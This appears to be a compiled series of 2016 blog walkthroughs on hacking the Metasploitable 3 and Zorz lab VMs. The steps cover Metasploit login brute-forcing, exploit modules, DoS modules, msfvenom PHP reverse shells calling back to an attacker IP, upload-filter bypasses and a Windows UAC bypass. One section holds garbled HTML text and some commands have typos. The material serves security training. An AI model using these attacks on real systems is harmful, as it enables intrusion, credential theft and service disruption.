Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities. It is intended to be used as a target for testing exploits with Metasploit, hence to brush up our Metasploit skills.

We already know that our target is metasploitable 3 so there is no point to discover our target. So, let’s straight move upto nmap scan.

nmap -p- -sV 192.168.1.8

We can see that FTP port is open so we can exploit it and to do so we need a dictionary file through which we can successfully attack. To make a dictionary file type the following command :

cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 –w /root/Desktop/dict.txt

CeWL is a command used to make a customized wordlist using a given URL. Using the above command will make a dictionary file from the Wikipedia of metasploitable3 and might help us to find our password.

After generating the wordlist through CeWL, open Metasploit by typing msfconsole on the terminal of your Kali.

And then type:

use auxiliary/scanner/ftp/ftp_login

msf exploit (ftp_login)>set username vagrant

msf exploit (ftp_login)>set rhosts 192.168.1.8

msf exploit (ftp_login)>set pass_file /root/Desktop/pass.txt

msf exploit (ftp_login)>set stop_on_success true

msf exploit (ftp_login)> exploit

Above used exploit will give you a correct password to go with the username. Once you have got it then open the WinScp software, give the target’s IP and the port number along with the username: vagrant and password: vagrant

Then click on Login button. After logging in you can find you the files on the FTP server and you can use them to your advantage.

↧

Hack Metasploitable 3 using Elasticsearch Exploit

December 12, 2016, 10:29 am

≫ Next: Metasploitable 3 Exploitation using Brute forcing SSH

≪ Previous: FTP Service Exploitation in Metasploitable 3

Elastic search is a distributed REST search engine used in companies for analytic search. And so we will learn how to exploit our victim through it. Start off by nmap.

nmap –p- -A 192.168.1.8

Nmap shows a splendid result and in the result you can see that HHTP service going on 9200 which is using elasticseatch REST. Let’s search it exploit on google.

YES! We have an exploit for that. Let’s use it to our advantage.

To use this exploit go to Metasploit and type:

use exploit/multi/elasticsearch/script_mvel_rce

msf exploit (script_mvel_rce)>set rhost 192.168.1.8

msf exploit (script_mvel_rce)>set rport 9200

msf exploit (script_mvel_rce)>exploit

↧

Metasploitable 3 Exploitation using Brute forcing SSH

December 13, 2016, 10:57 am

≫ Next: Hack Metasploitable 3 using SMB Service Exploitation

≪ Previous: Hack Metasploitable 3 using Elasticsearch Exploit

Target: Metasploitable 3

Attacker: Kali Linux

Scan the target IP to know the Open ports for running services. I am using nmap command for scanning the target PC. Type the following command on terminal in kali Linux.

nmap –p- -sV 192.168.1.8

In previous article it’s about FTP Login attack read from here.

So here you can see all available open ports and their services today this article will cover SSH login attack for which we required open SSH port luckily in Metasploit3 open 22 is open for SSH service So let’s exploit it for this we need a dictionary file. To make a dictionary file type the following command:

cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 –w /root/Desktop/pass.txt

Collect the wordlist from CeWL,

Start Metasploit framework by typing msfconsole on the terminal.

This module will test ssh logins on a range of machines and report successful logins If you have loaded a database plug-in and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/ssh/ssh_login

msf exploit (ssh_login)>set rhosts 192.168.1.8

msf exploit (ssh_login)>set port 22

msf exploit (ssh_login)>set username vagrant

msf exploit (ssh_login)>set pass_file /root/Desktop/pass.txt

msf exploit (ssh_login)>set stop_on_success true

msf exploit (ssh_login)> exploit

This’ll dump the credential as the username: vagrant and password: vagrant successful login for SSH connection moreover provides the session for victim’s shell.

↧

Hack Metasploitable 3 using SMB Service Exploitation

December 14, 2016, 2:02 am

≫ Next: Perform DOS Attack on Metasploitable 3

≪ Previous: Metasploitable 3 Exploitation using Brute forcing SSH

Target: Metasploitable 3

Attacker: Kali Linux

Scan the target IP to know the Open ports for running services. I am using nmap command for scanning the target PC. NMAP shown all available open ports and their services today this article will cover SMB login attack for which it requires open SMB port.

Type the following command on terminal in kali Linux.

nmap –p- -A 192.168.1.11

In previous article it’s about SSH Login attack read from here.

Luckily!!! In Metasploit3 port 445 is open for SMB service mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between server and client on a network.

Now it is necessary to create a dictionary file to exploit it. To make a dictionary file type the following command:

cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 –w /root/Desktop/pass.txt

CeWL is a customized wordlist generator that sticks to just the site you have specified and will go to a depth of 2 links and returns a list of words which can then be used for password crackers such as John the Ripper.

Start metasploit framework by typing msfconsole on terminal in kali Linux.

This module will test SMB logins on a range of machines and report successful logins. If you have loaded a database plug-in and connected to a database this module will record successful logins and hosts so you can track your access.

Type following command under msfconsole

use auxiliary/scanner/smb/smb_login

msf auxiliary (smb_login)>set rhosts 192.168.1.11

msf auxiliary (smb_login)>set rport 445

msf auxiliary (smb_login)>set smbuser vagrant

msf auxiliary (smb_login)>set pass_file /root/Desktop/pass.txt

msf auxiliary (smb_login)>set stop_on_success true

msf auxiliary (smb_login)> exploit

This exploit will start brute force attack to match the valid authentication and give green sign when founds the correct credential for SMB login.

Our attack is successful and we have got valid login vagrant: vagrant as username and password.

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

Hence using above credential this exploit will try to provide the meterperter shell.

Type following command to use this module for attack.

msf> use exploit/windows/smb/psexec

msf exploit (psexec)>set rhosts 192.168.1.11

msf exploit (psexec)>set rport 445

msf exploit (psexec)>set smbuser vagrant

msf exploit (psexec)>set smbpass vargrant

msf exploit (psexec)> exploit

Wonderful!!! Our meterpreter session 1 is opened and you have got victim shell.

meterpreter> sysinfo

↧

Perform DOS Attack on Metasploitable 3

December 14, 2016, 2:41 am

≫ Next: Hack Metasploitable 3 using Mysql Service Exploitation

≪ Previous: Hack Metasploitable 3 using SMB Service Exploitation

Target: Metasploitable 3

Attacker: Kali Linux

Scan the target IP to know the Open ports for running services. Use nmap command for scanning the victim PC. Type the following command on terminal in kali Linux to use aggressive scan.

nmap –p- -A 192.168.1.14

From the result of scan we found that port 3389 is open for remote desktop service and under open port 80 httpserver header is configured with Microsoft IIS 7.5

As we know port 3389 is badly affected with Dos attack moreover Microsoft IIS 7.5 has Classic ASP configured (it allows serving .asp files).There is a password protected directory configured that has administrative asp scripts inside. An attacker requests the directory with: $i30:$INDEX_ALLOCATION appended to the directory name IIS/7.5 gracefully executes the ASP script without asking for proper credentials.

https://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongad

Use Nessus tool to scan the vulnerabilities of target Pc. Form vulnerabilities scanning result it shows two high vulnerabilities for exploit.

Start metasploit framework by typing msfconsole on terminal in kali Linux when metasploit get loaded type following command for Dos attack.

This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code execution. This module will try to cause a denial-of-service.

msf > use auxiliary/dos/http/ms15_034_ulonglongadd

msf auxiliary(ms15_034_ulonglongadd) >set rhosts 192.168.1.14

msf auxiliary(ms15_034_ulonglongadd) >exploit

In same way we’ll create Dos attack through RDP connection for port 3389 using another module.

This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 Connect MCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition.

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf auxiliary(ms12_020_maxchannelids) >set rhost 192.168.1.14

msf auxiliary(ms12_020_maxchannelids) >set rport 3389

msf auxiliary(ms12_020_maxchannelids) >exploit

↧

Hack Metasploitable 3 using Mysql Service Exploitation

December 14, 2016, 9:15 am

≫ Next: Hack the Zorz VM ()CTF Challenge

≪ Previous: Perform DOS Attack on Metasploitable 3

Target: Metasploitable 3

Attacker: Kali Linux

Scan the target IP to know the Open ports for running services. Use nmap command for scanning the target PC. NMAP shown all available open ports and their services today this article will cover MYSQL attack for which it requires open port.

Type the following command on terminal in kali Linux.

nmap -p- -sV 192.168.0.103

And from nmap result we can see port 3306 is open for mysql.

Let’s penetrate more inside it, use nessus for vulnerability analysis. Through nessus scanning result it shows that MYSQL account is not password protected .when you suffer more you will find that directory gets open without password. In image the output result making conclusion that root account does not have password moreover it dumps the list of database on remote server. It also gave the hint that an attack can lunch attack on database.

Start metasploit framework by typing msfconsole on terminal in kali Linux when metasploit get loaded type given below command for mysql attack.

This module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=<5 .5.9="" a="" and="" as="" attack="" define="" directory="" dll="" enforced="" executable="" finished="" functions.="" is="" leave="" localsystem.="" module="" mysql="" not="" note:="" on="" or="" p="" payload="" permissions="" redefine="" runs="" service="" sys_eval="" sys_exec="" system="" target="" the="" this="" udf="" well="" when="" will="" write="">

msf > use exploit/windows/mysql/mysql_payload

msf exploit(mysql_payload) > set rhost 192.168.0.103

msf exploit(mysql_payload) > set rport 3306

msf exploit(mysql_payload) > exploit

Wonderful!!! Our meterpreter session is opened and you have got victim shell.

meterpreter> sysinfo

↧

Hack the Zorz VM ()CTF Challenge

December 15, 2016, 10:53 pm

≫ Next: Manual Penetration Testing in Metasploitable 3

≪ Previous: Hack Metasploitable 3 using Mysql Service Exploitation

Zorz is another VM that will challenge your webapp skills. There are 3 separate challenges (web pages) on this machine. It should be pretty straight forward. This machine will probably test your web app skills once again. There are 3 different pages that should be focused on(you will see). Your goal is to successfully upload a web-shell or malicious file to the server.

You can download this machine from here.

This machine (zorz) does not runs on vmware. So, in case you are using your Kali Linux in vmware(for attacking), you will probably need to run Zorz on a different system in Virtual Box and of course in the same network.

Target: Zorz

Attacker: Kali Linux

Let’s start with our all time favourite netdiscover to get the victim machine’s IP.

netdiscover

So, our target is located on 192.168.1.8. Let’s quickly do a nmap scan to get an idea of open ports.

nmap -p- -A 192.168.1.8

Ok, so we have port 22 and port 80 open. Let’s visit the IP on our browser.

So, we have an upload option available right in front of us. Let us quickly generate a php shell for reverse connection using msfvenom.

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.1.28 lport=4444 -f raw

Next, we copy the generated script “shell.php

”. Next we try to upload this file and voila, our shell gets uploaded successfully.

But we have no idea as to where our file gets uploaded on the server. In order to get the location/directory of our shell, we run dirbuster using the dictionary /usr/share/dirb/wordlists/big.txt

And we get to know of a directory named “uploads2”. Upon visiting this directory, we do not find our shell.php file there. Thus we try to manipulate the directory name and visit the directory ”uploads1”.

192.168.1.8/uploads1/

And yes. Our shell.php file is here. Before opening the file, let’s set our listener using metasploit.

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.28

set lport 4444

exploit

And then we return to our browser and click the shell.php file to open it.

Success. We have successfully exploited the level 1 security and we have a meterpreter session running right before us.

Now let’s go for the second level (Zorz Image Uploader 2) and try uploading the same file there.

We get an error this time as expected.

Time for some more tricks. Let us open the shell.php file in a text editor and just before our script, add the string “gif98”.

Upload successful.

This time the location of our file is “uploads2”. Let’s open it.

192.168.1.8/uploads2/

We send our previous meterpreter session to background and run the exploit once again.

background

run

And thereafter we click on our “shell.php.jpg” file in the uploads2 directory to open it.

Success again. We get our meterpreter session once again.

Now for our final task, we open the third level (Zorz Image Uploader 3) in order to upload our shell once again.

And without any edits to our “shell.php.jpg” file, we try uploading it here.

The file uploads successfully once again. And this time the directory it has been uploaded to is uploads3.

Let’s visit it.

192.168.1.8/uploads3/

We send our meterpreter session for level 2 to background once again and run the exploit yet again to exploit the third level.

background

run

Mission accomplished. We have successfully bypassed all the three levels of security on this machine.

Researcher and Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. contact here.

↧

Manual Penetration Testing in Metasploitable 3

December 16, 2016, 1:33 am

≫ Next: Exploitation of Metasploitable 3 using Glassfish Service

≪ Previous: Hack the Zorz VM ()CTF Challenge

Target: Metasploitable 3

Attacker: Kali Linux

Scan the target IP to know the Open ports for running services. I am using nmap command for scanning the target PC. Type the following command on terminal in kali Linux.

nmap –p- 192.168.1.14

As you can see it is showing multiple unknown open ports but we are not able to find running services on target IP.

Open target IP on browser with one of unknown port 8585 as 192.168.1.14:8585

Under this URL I have got directories like upload and word press lets penetrate inside it. Again type following URL on browser.

192.168.1.14:8585/uploads/

Now we are inside the upload directory but it is showing nothing special.

Since Nmap is fail to give complete detail about open ports therefore now I will scan again the target IP using NIKTO with open port for upload directory hence type following command on terminal

Nikto –h http://192.168.1.14:8585/uploads/

It’ll scan multiple ports on a server and checks for server configuration items such as the presence of multiple index files, HTTP server options.

Here it is showing that in upload directory HTTP method PUTallows client to save files on the web server which means I can upload a file on server and this stage could became the part of attack by uploading a malicious file as backdoor in web server.

Install poster plug-in from Firefox add-on. As poster let you perform HTTP request with parameters like: GET, POST, PUT and DELETE.

Prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.14 lport=4444 -f raw

Copy the code from to die() and save it in a file with .php extension. I had save the backdoor as shel.php on desktop and will later browser this file through poster to upload on webserver.

Click on the tools from the menu bar. And then click on Poster from the drop down menu.

A following dialog box will open. Here, browse the file that you will upload and click on PUT option. This exploring will show you that PUT is allowed that means you can upload through it

It will show you that the file is uploaded and displays complete results including headers.

And you can see the same on your browser that you file will be uploaded (as in our case the file is shel.php)

Simultaneously, open metasploit and use multi/handler:

use multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.12

set lport 4444

exploit

After hitting enter button on your keyboard, run the file you just uploaded. It will give you a meterpreter session.

↧

Exploitation of Metasploitable 3 using Glassfish Service

December 16, 2016, 9:13 am

≫ Next: Penetration Testing in Metasploitable 3 with SMB and Tomcat

≪ Previous: Manual Penetration Testing in Metasploitable 3

Target: Metasploitable 3

Attacker: Kali Linux

Use nmap command for scanning the target PC. NMAP will show all available open ports and their running services. Type the following command on terminal in kali Linux for aggressive scan.

nmap -p- -A 192.168.1.14

Open target IP on browser with one of unknown port 4848 as 192.168.1.14:4848

Start metasploit framework by typing msfconsole on terminal in kali Linux when metasploit get loaded type given below command for attack.

This module attempts to login to GlassFish instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It will also try to do an authentication bypass against older versions of GlassFish. Note: by default, GlassFish 4.0 requires HTTPS, which means you must set the SSL option to true, and SSLVersion to TLS1. It also needs Secure Admin to access the DAS remotely.

msf > use auxiliary/scanner/http/glassfish_login

msf auxiliary(glassfish_login) > set rhosts 192.168.1.14

msf auxiliary(glassfish_login) > set rport 4848

msf auxiliary(glassfish_login) > set STOP_ON_SUCCESS true

msf auxiliary(glassfish_login) > set user_file /root/Desktop/user.txt

msf auxiliary(glassfish_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(glassfish_login) >exploit

After few attempt successfully we have our login for GLASSFISH as admin: sploit

Let use this credential which we have got from metasploit and try to open target IP in browser as I am using: 192.168.1.14:4848/common/index.php

This URL gets open for administration console here it is asking for user and password login, now try to use admin: sploit as username and password respectively.

Through these credential we have breach admin console and got glassfish console and this page consist several common task.

↧

Penetration Testing in Metasploitable 3 with SMB and Tomcat

December 17, 2016, 4:17 am

≫ Next: Hack Admin Access of Remote windows 10 PC using Eventvwr Registry Key Exploit

≪ Previous: Exploitation of Metasploitable 3 using Glassfish Service

Target: Metasploitable 3

Attacker: Kali Linux

Let’s begin through scanning the target IP to know the Open ports for running services. I am using nmap command for scanning the target PC. Type the following command on terminal in kali Linux.

nmap –p- -sV 192.168.1.14

From nmap result we can see port 8282 is open for apache tomcat

Open target IP on browser as 192.168.1.14:8282 Tomcat is running on port 8282, but requires credentials to access.

Now we are going to login with psexec using smb port 445

PsExec>Exec \\192.168.1.14 -u vagrant -p vagrant cmd

This command is addressing the host IP and its credential which I have access from my previous article read fromhere.

-u for username: vagrant

-p for password: vagrant

cmd: to enter victim’s command prompt

As I already had a shell, I was able to retrieve the credentials from the tomcat-users.xml file, located at c:\program files\apache software foundation\tomcat\apache-tomcat-8.0.33\conf.

Type tomcat-users.xml

As soon as the command execute you can see I had got credential for tomcat username sploit and password sploit. Use this credential for attack using metasploit framework in kali Linux

Start metasploit framework by typing msfconsole on terminal in kali Linux when metasploit get loaded type given below command for tomcat attack.

This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

msf > use exploit/multi/http/tomcat_mgr_upload

msf exploit(tomcat_mgr_upload) > set rhost 192.168.1.14

msf exploit(tomcat_mgr_upload) > set rport 8282

msf exploit(tomcat_mgr_upload) > set HttpUsername sploit

msf exploit(tomcat_mgr_upload) > set HttpPassword sploit

msf exploit(tomcat_mgr_upload) > exploit

Wonderful!!! Our meterpreter session is opened and you have got victim shell.

Meterpreter> sysinfo

Another way to exploit your target

This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.

msf > use exploit/multi/http/axis2_deployer

msf exploit(axis2_deployer) > set rhost 192.168.1.8

msf exploit(axis2_deployer) > set rport 8282

msf exploit(axis2_deployer) >exploit

Awesome!!! Meterpreter session is opened again and you have got victim shell once again.

Meterpreter> sysinfo

Meterpreter> getuid

↧

Hack Admin Access of Remote windows 10 PC using Eventvwr Registry Key Exploit

December 20, 2016, 7:28 am

≫ Next: Wordpress Penetration Testing using Symposium Plugin SQL Injection

≪ Previous: Penetration Testing in Metasploitable 3 with SMB and Tomcat

First of all, to learn to how to hack victim’s PC click here. After hacking when you have gained a meterpreter session then type:

getprivs

using this command you will confirm the fact that you have not entered the administrator yet. So now, there is no need to worry.

Now use the following exploit

This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess () after starting your payload in a separate process.

As the command will make our file execute we will have a session with administrator privileges as shown

↧